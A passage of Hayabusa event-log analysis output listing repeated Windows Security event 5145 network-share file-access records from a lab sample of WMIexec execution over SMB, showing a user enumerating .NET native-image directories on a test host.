0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 